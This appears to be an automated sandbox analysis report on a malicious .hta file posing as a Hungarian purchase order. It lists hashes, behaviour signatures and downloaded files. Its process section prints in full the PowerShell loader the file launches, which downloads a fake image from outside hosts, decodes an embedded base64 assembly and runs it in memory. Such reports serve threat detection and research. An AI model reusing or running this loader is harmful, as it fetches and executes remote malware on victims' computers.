Analysis
max time kernel: 120s
max time network: 121s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 12-02-2024 17:57
Static task: static1
Behavioral task: behavioral1
  Sample: Rendelés_(PO5042208)_Az Idumont.hta
  Resource: win7-20231215-en
Behavioral task: behavioral2
  Sample: Rendelés_(PO5042208)_Az Idumont.hta
  Resource: win10v2004-20231222-en
General
Target: Rendelés_(PO5042208)_Az Idumont.hta
Size: 9KB
MD5: 0766fff13fcd69232a01442507c7faaf
SHA1: e559fef859f0da7dbb27ee0ee81b68f759b8772a
SHA256: 5f86822a5a049aaa09d6f11ad557f4c2ae8ce57b37daa6b00658fff4ee1ce090
SHA512: ae8bc05b1233b8495f18a3f11ebbd2a5e2ad8345b3eed593ef4885a76eff74fa5f9a11f150b087dfea1fba9a29d0ae8ac8107d7da5de7e5abdf848a1c8b68988
SSDEEP: 192:sv0r6VP2SMNXVBVLkC6YWILLDFDNk6cl26nWc8t9embQV:sv0rwQvDwhMDxNkmV9embm
Malware Config
Signatures
Blocklisted process makes network request (3 IoCs)
Processes (flow | pid | process):
  5 | 1828 | powershell.exe
  7 | 1828 | powershell.exe
  9 | 1828 | powershell.exe

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Modifies Internet Explorer settings
Processes (description | ioc | process):
  Key created | \REGISTRY\USER\S-1-5-21-3818056530-936619650-3554021955-1000\Software\Microsoft\Internet Explorer\Main | mshta.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes (pid | process):
  1828 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 1828 | powershell.exe

Suspicious use of WriteProcessMemory (4 IoCs)
Processes (description | pid | process | target process):
  PID 2364 wrote to memory of 1828 | 2364 | mshta.exe | powershell.exe
  PID 2364 wrote to memory of 1828 | 2364 | mshta.exe | powershell.exe
  PID 2364 wrote to memory of 1828 | 2364 | mshta.exe | powershell.exe
  PID 2364 wrote to memory of 1828 | 2364 | mshta.exe | powershell.exe
Processes
Process: C:\Windows\SysWOW64\mshta.exe
Command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Rendelés_(PO5042208)_Az Idumont.hta"
PID: 2364
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent: mshta.exe (PID 2364)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/731/999/original/new_image.jpg?1707144651', 'http://45.74.19.84/xampp/bkp/bkp_hta.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('w5x8fgEv-w5YOBA!=yekhtua&99212%420139D0B4D360A9=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'C:\ProgramData\' , 'Name'))}}
PID: 1828
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 212eda6bc96a69d7732429f99c69ea05
  SHA1: 2737ee189c8183d15af83a1cae2413e19e48a8b5
  SHA256: 1391b50540bcba7e204576203c8aff153dae638ff10b15bf65af12b7fc3cccca
  SHA512: 267fb96a0b1c6d28dea53de652944f3b9e988291e8653a2a8607a7714bcf769ce7e1b6efb6a11d50facc5316ccbd7f30a63440ab219c8fd293a663c5d2e68227

  Filesize: 65KB
  MD5: ac05d27423a85adc1622c714f2cb6184
  SHA1: b0fe2b1abddb97837ea0195be70ab2ff14d43198
  SHA256: c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
  SHA512: 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  Filesize: 171KB
  MD5: 9c0c641c06238516f27941aa1166d427
  SHA1: 64cd549fb8cf014fcd9312aa7a5b023847b6c977
  SHA256: 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
  SHA512: 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06